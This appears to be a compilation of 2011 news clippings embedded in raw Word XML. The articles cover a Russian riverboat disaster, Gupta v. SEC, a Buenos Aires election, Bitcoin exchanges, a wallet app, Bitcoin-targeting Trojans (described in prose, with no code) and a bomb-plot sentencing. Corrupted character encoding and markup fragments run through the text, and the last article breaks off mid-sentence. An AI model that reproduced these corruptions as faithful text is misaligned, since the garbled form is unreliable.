America's Most Promising Startups The 25 Cheapest Cities in the U.S. The Best Places to Raise Your Kids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 S. Broadband Policy U.S. Automakers U.S. Retail Sales U.S. Energy Policy U.S. Stock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2011.07.12 00:17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-07-11/certain-rifle-purchases-require-gun-sellers-to-alert-u-s-.html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Russian Riverboat Sank in ‘Minutes,' Killing Up to 129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2011, 2:18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Cyprus Blast Kills 12, Injures 62, Reduces Power by 50% Russian Cruise Ship Carrying More Than 200 Sank in Б─≤MinutesБ─(tm) MurdochБ─(tm)s Riskiest Scrape May Not End With Tabloid Shutdown Israel Bars Entry to 85 Pro-Palestinian Activists at Airport Syria Forces Kill 13 Amid Mass Anti-Government Protests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Ilya Arkhipov and Lyubov Pronina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(Bloomberg) - As many as 129 people may have died when a 56-year- old Russian tourist boat sank in the Volga River yesterday, sparking a probe into safety violations on the unlicensed cruise.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no hope remains for finding additional survivors from the Bulgaria two-deck river cruise ship, Emergency Minister Sergei Shoigu told President Dmitry Medvedev today outside Moscow. Of 208 people on board, 79 people were rescued, while 55 bodies have been recovered, according to the ministry.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Medvedev declared tomorrow a day of mourning, and he and Prime Minister Vladimir Putin expressed condolences. Medvedev, who pledged to fight corruption during his term, ordered an investigation into the operator and officials responsible.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sank in two or three minutes, very fast," Liliya Khaziyeva, a spokeswoman for the Rescue Service from the neighboring Udmurtia region, said by phone from a boat near the accident site. "We found dead people wearing life vests, people who were simply unable to leave the ship."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is one of Russia's deadliest passenger accidents since the collapse of the Soviet Union in 1991. Plane crashes in Irkutsk killed 125 people in 2006 and 145 people in 2001, according to the Aviation Safety Network's website. It is the worst shipping disaster in more than 25 years, according to Alexei Klyavin, president of the Association of Shipping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Help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Nikolai Chernov, a survivor, said on state television that he saw at least two ships pass by without offering help.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ship was returning to Kazan, the capital of Tatarstan, from the town of Bolgar when it sank about 740 kilometers (460 miles) east of Moscow at 1:58 p.m. local time on July 10. It sank about three kilometers from shore, according to a statement on the Emergency Ministry's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30 children were being entertained in one room, according to passenger reports," Khaziyeva said. Divers are working at depths of 7 to 14 meters, she said. Workers have combed the river banks and islands in an area where the water stretches into a reservoir about 30 kilometers across,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Bulgaria hadn't been overhauled since 1980 and was running with a malfunctioning left engine, while the cruise was operated without a license to carry passengers, the Prosecutor General's Office said on its website. The boat had passed an inspection this year, according to state television.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‘Complete Review'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Bulgaria was listing to the right when it left Kazan, which may be one of the reasons it sank, Vladimir Markin, spokesman for the Investigative Committee said on state television. A criminal investigation has been opened into violations of transportation safety regulations, according to the Investigative Committee's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Medvedev ordered "a complete review" of passenger ships, to be followed by repair or decommissioning for older boats. "The number of old tubs in operation exceeds all limits," he said. "The government owns only a small number of these ships, but that doesn't mean that the government should shirk control."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Ilya Khrennikov and Marina Sysoyeva in Moscow. Editors: Torrey Clark, Torrey Clark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Ilya Arkhipov in Moscow at iarkhipov@bloomberg.net; Lyubov Pronina in Moscow at lpronina@bloomberg.net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Balazs Penz at bpenz@bloomberg.net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3000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 On Energy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Nissan Quickest to Recover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Baseball's 3000 Hit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CEO Guide to Assistive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and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The Rise and Inglorious Fall of Myspace The Best Undergraduate B-Schools of 2011 Want to Live Cheaply? Head to Texas Why Some Skypers Are Seeing Red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Market America's American Dream Machine The Rise and Inglorious Fall of Myspace Want to Live Cheaply? Head to Texas FireEye: Botnet Busters Career Women at Midlife: Sadder and Sicker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Mozilla's Crowdsourcing Mystique Can the FT Help Publishers Quit Their Apple Addiction? Audi's Design Drive How to Make SEO Work for You Amazon May Soon Need to Collect Sales Tax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The 3000 Club World's Most Expensive Cities 2011 America's Most Promising Startups The 25 Cheapest Cities in the U.S. The Best Places to Raise Your Kids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Russian Economy Entrepreneurship in a Recession Russian Business Marketing to Women In-Game Advertising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2011.07.11 22:17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-07-11/russian-riverboat-sank-in-minutes-killing-up-to-129-people.html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Gupta Lawsuit Against SEC Can Go Forward, U.S. Judge Rules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2011, 1:31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SIPC Opposes Attempt by Mets Owners to Dismiss Madoff Suit ArchBrook Laguna, Omega, Ambac, Vitro, Seahawk: Bankruptcy Laptop Seizure, Search at Border Challenged by StudentБ─(tm)s Suit Expert- Network Founder Who Refused FBI Wire Expects Arrest NFL Lockout Can Continue as Appeals Court Reverses Judge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Bob Van Voris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excerpt from opinion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(Bloomberg) - Rajat Gupta, the former Goldman Sachs Group Inc. director, can proceed with a suit claiming the U.S. Securities and Exchange Commission violated his rights when it filed an administrative action accusing him of passing illegal stock tips.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 initiated the administrative proceeding in Washington on March 1, claiming Gupta passed information to Galleon Group LLC co-founder Raj Rajaratnam about Goldman Sachs and Procter &amp; Gamble Co., where Gupta was also on the board.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District Judge Jed Rakoff ruled today that Gupta, who hasn't been charged criminally, may argue that the agency intentionally singled him out for unfair treatment in retaliation for claiming his innocence. Rakoff said that all of the other suits filed in the Galleon case, against 21 people and seven companies, are in federal court.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the unusual case where there is already a well- developed public record of Gupta being treated substantially disparately from 28 essentially identical defendants, with not even a hint from the SEC, even in their instant papers, as to why this should be so," Rakoff wrote in an opinion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Rajaratnam was found guilty of 14 criminal counts of conspiracy and securities fraud on May 11. He is awaiting sentencing.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Gupta v. SEC, 11-CV-1900, U.S. District Court, Southern District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Andrew Dunn, Mary Romano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Bob Van Voris in New York at rvanvoris@bloomberg.net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3000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 On Energy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Nissan Quickest to Recover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Baseball's 3000 Hit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CEO Guide to Assistive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and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The Rise and Inglorious Fall of Myspace The Best Undergraduate B-Schools of 2011 Want to Live Cheaply? Head to Texas Why Some Skypers Are Seeing Red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Career Women at Midlife: Sadder and Sicker FireEye: Botnet Busters Market America's American Dream Machine The Rise and Inglorious Fall of Myspace Anshu Jain: Deutsche Bank's Next CEO?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Can the FT Help Publishers Quit Their Apple Addiction? Mozilla's Crowdsourcing Mystique Audi's Design Drive How to Make SEO Work for You Amazon May Soon Need to Collect Sales Tax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The 3000 Club World's Most Expensive Cities 2011 America's Most Promising Startups The 25 Cheapest Cities in the U.S. The Best Places to Raise Your Kids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 S. Broadband Policy U.S. Energy Policy U.S. Stock Market U.S. Retail Sales U.S. Manufacturing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2011.07.11 21:17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-07-11/gupta-lawsuit-against-sec-can-go-forward-u-s-judge-rules.html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Buenos Aires Mayor Macri Leads Filmus Heading to Runoff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2011, 12:28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Argentine Jimmy Hoffa Sidelined as Fernandez Woos Middle Class Argentina Files Criminal Charges Over Б─≤FalseБ─(tm) CPI Reporting Buenos Aires Flights Resume After Disruption From Volcanic Ash MurdochБ─(tm)s Riskiest Scrape May Not End With Tabloid Shutdown Syria Forces Kill 13 Amid Mass Anti-Government Protests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Eliana Raszewski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final results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(Bloomberg) - Buenos Aires mayor Mauricio Macri will face a runoff against President Cristina Fernandez de Kirchner's candidate in a bid to govern Argentina's capital after just missing the 50 percent threshold in voting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Macri had 47.1 percent support compared with 27.8 percent for Senator Daniel Filmus of Fernandez's Victory Front alliance, the city's electoral commission reported today. Filmmaker Fernando Solanas had about 13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Macri, 52, vowed to focus on poverty in his second term during a speech to supporters last night while Filmus's allies said his performance in getting into the runoff bodes well for Fernandez in October's national elections. The July 31 runoff between the two men will be a rematch of the 2007 election, which Macri won with 61 percent of the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really pleased at the campaign Filmus has run," Argentine Economy Minister Amado Boudou, Fernandez's running mate, told reporters last night. "We have raised the base of support from where we were in 2007."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four years in office, Macri, the former president of the Club Atletico Boca Juniors soccer club and son of a construction tycoon, retained support among the capital's 2.5 million voters by funding flood prevention works, creating a city police force, and building 65 kilometers (40 miles) of bike paths.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Go-Getter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see him as a go-getter, an achiever," pollster Jorge Giacobbe said in a telephone interview before the election.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Macri will probably defeat Filmus, a 56-year-old former education minister, by taking about 60 percent of votes in a runoff, said Mariel Fornoni, director of polling company Management &amp; Fit. The mayor spoke to supporters last night without directly addressing the runoff or his opponent.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love this wonderful country in which we live, but we want this love to be turned into concrete action," Macri said. "Poverty is a concrete problem that affects millions and we have to work together to find a solution."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defeat for the Victory Front in the nation's capital won't hurt Fernandez's chances of winning another term in the Oct. 23 election, Fornoni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Fernandez is very popular, has a high approval rating for her government and is leading in the presidential polls, she hasn't been able to pass that on to her candidates," Fornoni said in a July 5 telephone interview. "Macri has an almost 50 percent approval rating because people value what he has done over the past four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Presidential Poll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Fernandez, 58, has 49.8 percent support among eligible voters while Ricardo Alfonsin of the Radical Civic Union party has 10.5 percent, according to a June 22-24 poll by Buenos Aires-based CEOP Opinion Publica. The survey of 1,426 people has a margin of error of 2.6 percentage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Argentine law, a presidential candidate can win the election and avoid a runoff by receiving more than 45 percent of the vote, or 40 percent and a 10 percentage-point lead over the nearest competitor. A runoff, if needed, will take place Nov. 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Macri ruled himself out as a presidential candidate on May 7, when he announced he would seek re-election as mayor. Macri's PRO party hasn't said whom it will support in the national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for Fernandez has been cemented by the agriculture- based economy's performance under her stewardship and during the 2003-2007 term of her late husband and predecessor, Nestor Kirchner, said Guillermo Schamis, a political analyst at CEOP.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America's second-biggest economy is heading for a ninth straight year of economic growth and will expand 6.7 percent this year, according to the median estimate of eight economists surveyed by Bloomberg. The jobless rate fell to 7.4 percent in the first quarter from 8.3 percent in the same period of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"Argentine society has a tacit accord to maintain the status-quo and leave changes for another time," Giacobbe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Bill Faries, Richard Jarvie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Eliana Raszewski in Buenos Aires at eraszewski@bloomberg.net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Joshua Goodman at jgoodman19@bloomberg.net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3000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 On Energy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Nissan Quickest to Recover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Baseball's 3000 Hit Club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CEO Guide to Assistive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and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The Rise and Inglorious Fall of Myspace The Best Undergraduate B-Schools of 2011 Want to Live Cheaply? Head to Texas Why Some Skypers Are Seeing Red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FireEye: Botnet Busters Career Women at Midlife: Sadder and Sicker Market America's American Dream Machine Creative Management Practices for Making Work Work Mechanical Serfdom Is Just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Mozilla's Crowdsourcing Mystique Audi's Design Drive How to Make SEO Work for You Amazon May Soon Need to Collect Sales Tax Making a Profit and a Difference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The 3000 Club World's Most Expensive Cities 2011 America's Most Promising Startups The 25 Cheapest Cities in the U.S. The Best Places to Raise Your Kids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Lead Generation Thailand's Economy Change Management Mobile Internet Business Integration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2011.07.11 20:17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-07-11/buenos-aires-mayor-macri-leads-filmus-heading-to-runoff-vote.html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Cleaning up the Bitcoin act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Camp BX live with high-sec trading platform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Richard Chirgwin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so far is that a little-known hacker hobby currency called Bitcoin suddenly came to the notice of the press, then to the notice of regulators, and finally to the notice of hackers. Believers are reluctant to moderate their hype; regulators and lawmakers want to either shut the whole thing down, or at least tax it; and hackers still see it as an attractive target.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Camp BX, a new exchange launched last week, hopes to address at least some of the problems. Could a combination of security and legitimacy solve BitcoinБ─(tm)s problems? The Register spoke to Keyur Mithawala of Camp BX Б─" and naturally enough, the conversation started around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Б─°Although it looks like a hobby project, Mt Gox was already processing around US$324 million worth of Bitcoin transactions per year when youБ─(tm)re dealing with millions of Bitcoins, security has to be the core concern,Б─² Mithawala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 have worked for telecoms and finance companies, so I came at this from a corporate standpoint. You might not get a chance to rebuild if your security is compromised.Б─²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Physical security is addressed by hosting the exchange in a secure data centre with three carrier connections.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most-promoted aspect of platform security is the Camp BX association with McAfee, which runs Б─°12,000 to 13,000 scripted testsБ─² against the site each night, Mithawala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well, the Bitcoin Conservancy in the UK conducts penetration tests against the platform, and Mithawala says that internally, the organization uses a peer-review mechanism to try and avoid all code vulnerabilities. Bitcoin volatility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as recent events have illustrated, technical security isnБ─(tm)t the only challenge facing exchanges. The volatility of the currency itself is also a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Mithawala says this price volatility illustrates a gap in BitcoinБ─(tm)s design. Б─°A core thing thatБ─(tm)s missing in all the exchanges is that there is no functionality for short selling.Б─²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short-selling got a bad reputation in the global financial crisis, itБ─(tm)s still an important market mechanism, he believes, one which would help reduce the range of prices Б─" and therefore the volatility Б─" of Bitcoin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Б─°If someone believes Bicoin prices should be lower at a particular point in time, they should have that option.Б─²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BitcoinБ─(tm)s Б─°one-sidedБ─² price pressure makes the currency vulnerable to Б─°flash crashesБ─², he believes, leading to variations that can be as much as Б─°hundreds of percentage points in a month.Б─²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volatility drives Bitcoin towards purely speculative exchanges, he told The Register. Б─°If prices can stabilize, thatБ─(tm)s when the Bitcoin economy will really take off.Б─²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Liquidity is also a problem in the world of Bitcoin exchanges. If youБ─(tm)re unfamiliar with the scale of the Б─°realБ─² economy, US300 million or so in trades each year sounds like a lot; but as Mithawala points out, the world of foreign exchange deals in trillions.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BitcoinБ─(tm)s small size Б─" and consequent low liquidity Б─" creates two problems. The first is that large trades can exceed the liquidity of the exchange, which creates the second problem, that an individual with large holdings can use large trades to manipulate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Б─°We believe we can stabilize prices if Camp BX is processing around 20 percent of total volume,Б─² Mithawala said. Compliance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 lot of uncertainty over the legality of Bitcoins in America, he said: money laundering laws, trading laws, and currency laws all impact on whether or not Bitcoins can be regarded as completely legal.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Б─°We decided to do this project legally,Б─² Mithawala said. To that end, he said, Camp BX consulted with a host of regulators, including the Department of Treasury and the Department of Banking and Finance, as well as state regulators.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Б─°Our assessment is that Bitcoin canБ─(tm)t be banned outright Б─" it would be like outlawing mathematics. If it can comply, then it can be legal. We donБ─(tm)t want Bitcoins to be underground and illegal.Б─²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Mithawala says Camp BX will stay in touch with regulators about its operations.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Transparency is also important, Mithawala believes, and in a way this looks paradoxical, given that one of the attractions of Bitcoin is supposed to be anonymity.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users arenБ─(tm)t the same as exchanges. Mithawala said an exchange has to be transparent, visible and credible: it has to be backed by people you can name and phone numbers you can call.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Б─°For example, Tradehill is the number two exchange right now. If you want to transact, then you put your money into a personal bank account in New Jersey.Б─²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does this look risky from outside, he said it arguably violates foreign exchange laws.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Б─°We are offering clear processes of how we do the money transfer, who to contact, and we provide all the information that users will need to have confidence in us,Б─² he told The Register.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AuthorБ─(tm)s note: I canБ─(tm)t tell you whether Camp BX will work or not. IБ─(tm)m certain there are questions I neglected to ask Б─" and IБ─(tm)m also certain that El Reg readers will think of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problem is that Camp BX's attention is on US regulation, and Bitcoin is international. Will this disadvantage users in other countries?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Possibly the greatest challenge for Camp BX will be in asking Bitcoin users to swap some of their freewheeling anarchy for a secure and transparent exchange.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2011.07.11 03:38</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.theregister.co.uk/2011/07/10/camp_bx_goes_live/</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 Digital-Wallet App Hits Android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Mike Isaac Follow @mj_isaac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app for Android allows users to trade the alternative form of cash from the comfort of their phones. Photo courtesy of Brandon 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new, unconventional form of a digital wallet available for your Android phone. And it's not the Google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introduced to the Android Market on Wednesday, the Bitcoin app for Android turns your smartphone into a wallet for Bitcoins, a form of alternative, decentralized currency that has been circulating the web for a few years. The app allows you to store and transfer Bitcoins from one device to another, which means you'll be able to pay for items without having to use cash or credit, all from the comfort of your own smartphone.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want to transfer Bitcoins to another account, a QR code pops up on your smartphone's screen. The other user simply scans the QR code with his or her phone, and the Bitcoins are transferred to the second phone's account. If you happen to lose your phone, it's not a huge deal - all of your Bitcoins are backed up with your Google account, synced to the cloud.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Bitcoin appeals mostly to the hacker types," said Android developer Brandon Iles, the app's creator. "Down the line, though, it could gain traction between friends. There's an advantage over credit card companies because thereБ─(tm)s no fees involved in the transaction."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virtual currency received some small amount of attention when it was initially developed in 2009, based primarily on a paper published by developer Satoshi Nakamoto. But Bitcoins received much more attention in recent months after Gawker published a story on the use of Bitcoins to buy illegal drugs from the underground web site "Silk Road." Since the story ran, Bitcoins have been at the forefront of the news, especially in light of Google's own digital wallet initiative, aptly titled "Google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can transfer Bitcoins to and from each others' accounts using scannable QR codes. Photo courtesy of Brandon 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want to adopt the new form of currency face a number of problems, however. The market value of a Bitcoin has been anything but stable; in mid- June, the value of a Bitcoin fell from $17 USD to less than $1 in a matter of minutes, after copies of a prominent Bitcoin trading market's user database started circulating freely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a Trojan Horse virus capable of stealing Bitcoins from user accounts has been circulating the web, according to virus protection company Symantec. One user claimed a theft of 25,000 Bitcoins from his account.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"ItБ─(tm)s still very much the wild west out there," said Iles, who developed the Android application with one other partner in his spare time. Iles' day job is at Google.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Iles expects to add more features to the app in the coming months, including a PIN number and in-app currency converter, which can be used to equivocate established currencies (like the dollar or yen) into Bitcoin amounts, and vice versa.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application is available for free on the Android Market for devices running version 2.2 (Froyo) and above. It comes with a disclaimer: The app is still in development and could potentially lose some of your Bitcoins, so test it with small amounts to begin with.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less complicated explanation of Bitcoins, see the video explainer below.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Malware Steals Your Bitcoin EFF and BitCoin Bitcoin Prices Plummet on Hacked Exchange Bitcoin to replace international power structure with Neal Stephenson dystopia Underground Website Lets You Buy Any Drug Imaginable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is a Wired.com staff writer covering Google and the mobile beat. He's written on a number of different tech topics, from startups to social media. Check out his Google+ profile here.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Follow @mj_isaac and @GadgetLab on Twitter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Wired News 2011.07.08 02:34</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.wired.com/gadgetlab/2011/07/bitcoin-android-app/?currentPage=all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Malware Targets BitCoin Virtual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Fahmida Y. Rashid 2011-07-01 Article Rating: /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0 user comments on this Midmarket story.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Attackers are creating Trojans that steal BitCoins from other users. While rudimentary, the attacks are occurring because there is some money in the electronic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Rate This Article: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Poor Best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PDF Version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Proving that cyber-criminals will steal practically anything, researchers have recently identified malware designed to steal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anonymous decentralized virtual currency commonly used online among people interested in keeping their transactions secret. The digital currency is not tied to any real money, but traded on an electronic exchange to establish its value, Andrew C. Herlands, director of security strategy of Application Security, told eWEEK. BitCoins have generally hovered around $14 to $17 per unit.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 stone. We both agree it's worth a dollar. So, when I give you the stone, we agree you now have a $1," Herlands said, explaining the theory behind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commonly used for illegal transactions, such as buying drugs online, but that is not the only purpose. During its 50-day spree, the group LulzSec also received donations of BitCoins from supporters, noting that the funds were entirely untraceable. The virtual currency may also be gaining some legitimacy, as Meze Grill, a New York City restaurant, recently started accepting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 particular piece of malware is designed to trick user accounts into sending money, via BitCoins, to the thief's account without the user's knowledge, Alex Gostev, chief security expert at Kaspersky Lab, wrote June 28 on the SeucreList blog. The account receiving transferred BitCoins was suspended because the server hosting it detected suspicious activity.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mechanism for spending BitCoins is fairly simple. Users buy BitCoins with real money and keep them in their e-wallet, which is client software installed locally on the computer. When a user wants to give someone some BitCoins, they enter a cryptographic code assigned to the recipient, and the "funds" are transferred from the user's wallet to another person's wallet via a peer-to-peer network. No names are required, and BitCoins are like cash: Once gone, it's gone.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BitCoins users get in the business of "mining," or generating more of the currency to increase the pool of available funds. Understandably, this is intentionally a complex process in order to prevent people from flooding the market with BitCoins and devaluing it. The mining is done with a specific application that runs mathematically intensive operations that require a lot of time and computer processing resources.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Gostev analyzed Trojan.NSIS.Miner.a, which was "spreading" among Russian users. The Trojan is a malicious module packaged with the legitimate BitCoin Miner tool. Miner.a installs itself onto the compromised machine and launches the mining tool without the user's knowledge. After the coins are generated, the idea is to transfer the newly minted coins to the attacker's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cyber-criminals seem to think that it's more profitable to steal computer resources rather than e-wallets," Gostev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 mining was being performed across multiple IP addresses, the server hosting the attacker's account temporarily suspended it for exhibiting botnet-like tendencies.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Gostev called the scam the attacker's "very own Klondike," noting that if the account hadn't been shut down, it could have been a lucrative operation.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 and F-Secure researchers identified a different malware, called CoinBit, targeting BitCoins only a few days earlier. The CoinBit Trojan is "not very professional-looking," F-Secure researchers wrote on the company blog June 17. A "snatch and grab" malware, it attempts to find the wallet file on the infected computer and transfer it to a Hotmail email address using a Polish SMTP server. Having the wallet file gives the attacker full control of all the funds associated with that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Symantec's Stephen Doherty recommended that BitCoin users encrypt their wallets with a strong password to prevent attackers from gaining the wallet's contents.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of these Trojans were fairly rudimentary and easy to shut down, as the cyber-criminals' information, such as email address or server address, were hard-coded in the source code. Attackers will continue to target BitCoins so long as there's some money associated with the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malicious software to target BitCoin was Stealthcoin, which first emerged around April. Like the miner Trojan analyzed by Kaspersky, Stealthcoin also used a network of compromised machines to create a covert mining operation. In a separate incident, an unknown criminal allegedly transferred 25,000 BTC, worth approximately $500,000, out of an unsuspecting user's wallet in the first theft of BitCoins this month.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>eWeek 2011.07.01 23:12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.eweek.com/c/a/Midmarket/Malware-Targets-BitCoin-Virtual-Currency-895469/</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Synagogue Bomb Plotters Sentenced to 25 Years in Prison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29, 2011, 1:30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New York City Council Votes 49-1 for $66 Billion 2012 Budget New JerseyБ─(tm)s Civil Union Law Challenged by Rights Group BulgerБ─(tm)s Old Indictment Dropped to Focus on Racketeering NYC Plans Б─≤I DoБ─(tm) Campaign to Woo Gay Weddings After March Rod Blagojevich Jury to Deliver Verdicts on 18 of 20 Counts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Chris Dolmetsch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judge's comment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29 (Bloomberg) - Three men convicted of plotting to blow up New York synagogues and to fire heat-seeking missiles at U.S. military planes were sentenced to 25 years in prison.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District Judge Colleen McMahon in Manhattan handed down punishments today against James Cromitie, 45, Onta Williams, 35, and David Williams, 30, who were found guilty in October of crimes including conspiracy to use weapons of mass destruction against the U.S. A fourth defendant, Laguerre Payen, had his sentencing postponed pending a psychiatric evaluation.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McMahon called Cromitie and his co-defendants "thugs for hire," adding that "I am nonetheless convinced a sentence of 25 years, a quarter of century behind bars, is sufficient to punish you for what happened and what didn't happen."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men were accused of planning to bomb the Riverdale Temple, a Reform synagogue in the Bronx section of New York, and the nearby Riverdale Jewish Center, an Orthodox synagogue, in May 2009. They also sought heat-seeking missiles to fire at aircraft at the Stewart Air National Guard base in Newburgh, New York, the U.S.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sought life sentences for the three men, saying they were career criminals and willing participants in a plot organized by a government informant, Shahed Hussain, who was posing as a member of the Pakistani terrorist organization Laiksh-e-Mohammad.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‘Little Respect'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shown little respect for the law throughout their adult lives," the U.S. said in a sentencing memorandum dated June 8. "This investigation revealed what their rap sheets never could: that these defendants were among the handful of people in the country who would actually agree to join forces with a terrorist to bomb synagogues."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defense argued that the men were the victims of entrapment, lured into the plan by a paid government informant who gave them money for rent, food and car fare, and who promised them $250,000 in cash, a BMW, vacations in Puerto Rico and a barbershop.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U.S. v. Cromitie, 09-cr-00558, U.S. District Court, Southern District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Andrew Dunn, Charles Carter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Chris Dolmetsch in New York at cdolmetsch@bloomberg.net.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READER DISCUSSION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America's Economically Strongest Metro Areas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Nissan Quickest to Recover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S&amp;P/Case-Shiller Index April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and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Content Read E-mailed Discussed Slide Shows The Rise and Inglorious Fall of Myspace Why Some Skypers Are Seeing Red Bayer Aspirin Is Feeling Plenty Healthy FarmVille Meets the Hollywood Tie-In Win a Dinner with Obama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The Rise and Inglorious Fall of Myspace Why Some Skypers Are Seeing Red Variable Annuities: Lifelong Income, High Cost Bitcoins: Currency of the Geeks Bayer Aspirin Is Feeling Plenty Healthy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Bayer Aspirin Is Feeling Plenty Healthy Building a Cosmetics Brand from Scratch What Now, Chairman Bernanke? Why Some Skypers Are Seeing Red The $32,000 Startup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 The 25 Cheapest Cities in the U.S. World's Most Expensive Cities 2011 Best Undergraduate Business Schools 2011 The Best Places to Raise Your Kids 2011 America's Most Promising Social Entrepreneurs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Popular Slide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Music Industry Research In Motion Advertising in a Recession Women in Leadership Marketing to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2011.06.29 21:15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-29/synagogue-bomb-plotters-sentenced-to-25-years-in-prison.html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The webs secret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Lyons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June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if people could use the Internet to create a new kind of money, one that didnt involve governments and central banks and could be used anonymously, like cash? That is the idea behind Bitcoin, a virtual currency that has caught the attention of computer geeks, financial speculators, and drug dealers. For the first time, you can buy anything online without giving your credit-card number or bank-account information leaving no trace at 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Hundreds of merchants accept Bitcoins for things like books, computers, and professional services. The currency trades on a handful of Bitcoin exchanges, where the price of a Bitcoin fluctuates based on demand. Not long ago a single Bitcoin sold for less than a dollar, but in recent months the price climbed to $8, then to $20, then above $30, before falling back to $18, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>current level.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What exactly are you buying? A Bitcoin is basically just a little bit of encrypted code that can be zipped over the Internet and stored in a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>digital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concept was proposed by a mysterious hacker named Satoshi Nakamoto (no one knows who he is, and the name is believed to be a pseudonym), who published a white paper describing a way in which computers connected over the Internet could be used to create an unregulated "crypto-currency." New York Senator Charles Schumer recently called Bitcoin "an online form of money laundering," after learning about an online warehouse called Silk Road where sellers advertise an astounding array of illegal wares - marijuana, hashish, LSD, ecstasy, cocaine, heroin - and where the only currency accepted is the Bitcoin. (Silk Road is currently shut down, though its anonymous manager claims he intends to start back up soon.)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there are about 6.5 million Bitcoins in circulation. The money supply is controlled by software algorithms and the total supply will max out at 21 million coins. You can crank out Bitcoins on a PC, but it's an incredibly computer-intensive task, and it will keep getting harder as the number of Bitcoins in existence increases. Some people have pooled together hundreds of machines to "mine" Bitcoins. Most folks, however, just buy them on an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already are hoarding Bitcoins, expecting a Bitcoin bubble will drive the value up to hundreds, maybe even thousands of dollars per coin. The biggest holder, whose identity is not known, is sitting on about 300,000 coins, currently worth about $6 million, says Donald Norman, who runs the London-based Bitcoin Consultancy, which advises companies that want to get in on the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Norman says the power of 